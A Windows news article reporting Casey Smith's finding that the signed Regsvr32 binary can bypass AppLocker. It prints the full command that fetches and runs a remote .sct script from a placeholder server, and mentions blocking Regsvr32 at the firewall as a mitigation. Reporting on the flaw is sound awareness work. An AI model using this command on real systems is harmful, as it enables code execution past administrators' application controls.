Regsvr32 can be used to bypass AppLocker on Windows 10

By: Vamien McKalin
2 minute read
windows 10 clock fix

A researcher from Colorado who goes by the name, Casey Smith, has found out that Regsvr32 can be used to bypass AppLocker on Windows 10, and this is a big problem for computer users, especially those in the business environment.

AppLocker was first introduced in Windows 7 and Windows Server 2008 R2. It is designed to allow administrators to specify which group or users can take advantage of some or all applications based on the unique identity of files. If you’re a person who tends to use AppLocker, then it should be common knowledge that it can be used to create certain rules to allow applications to run or stop them in their tracks.

For those who might be unaware, Regvr32 can be used to register and unregister DLLs. This is not a one-click tool seeing as it is a command-line utility, so only advanced computer users should seek to take advantage of what it has to offer.

We understand that by using this technique, it doesn’t alter the computer system’s registry, which makes it difficult for admins to know if any changes have been made.

regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll

“The amazing thing here is that regsvr32 is already proxy aware, uses TLS, follows redirects, etc. … And … You guessed a signed, default MS binary. So, all you need to do is host your.sct file at a location you control,” Smith wrote.

The above technique doesn’t require administrative privileges and it doesn’t alter the registry. Furthermore, the scripts can be called over both HTTP or HTTPS. At the moment, Microsoft has not released a patch for this little problem, so the only option at this point is to block Regsvr32 via the Windows Firewall.

Interestingly enough, the software giant has yet to respond about this security issue facing its operating system. Now that it is out in the open, we expect to hear something from the company along with talks of a future patch.

For various PC problems, we recommend this tool.

This software will repair common computer errors, protect you from file loss, malware, hardware failure and optimize your PC for maximum performance. Fix PC issues now in 3 easy steps:

  1. Download this PC Repair Tool rated "Excellent" on TrustPilot.com.
  2. Click “Start Scan” to find Windows issues that could be causing PC problems.
  3. Click “Repair All” to fix all issues with Patended Technologies (requires upgrade).

Next up

Best Windows 10 antivirus software to use in 2018

By: Radu Tyrsina
7 minute read

Update – 2018 will soon come to an end and we already have a guide on what is the best antivirus you should get in […]

Continue Reading

These features are out for good with Windows 10 version 1809

iamsovy@gmail.com' By: Sovan Mandal
2 minute read

Microsoft is all set to launch its next big update, Windows 10 version 1809 in October. While that should be a nice piece of news […]

Continue Reading

Windows 10 18H2 builds no longer receive new features

By: Matthew Adams
3 minute read

The Windows 10 October 2018 Update (otherwise 18H2) rollout might now be two to three weeks away. For the last few months, new build previews […]

Continue Reading

Discussions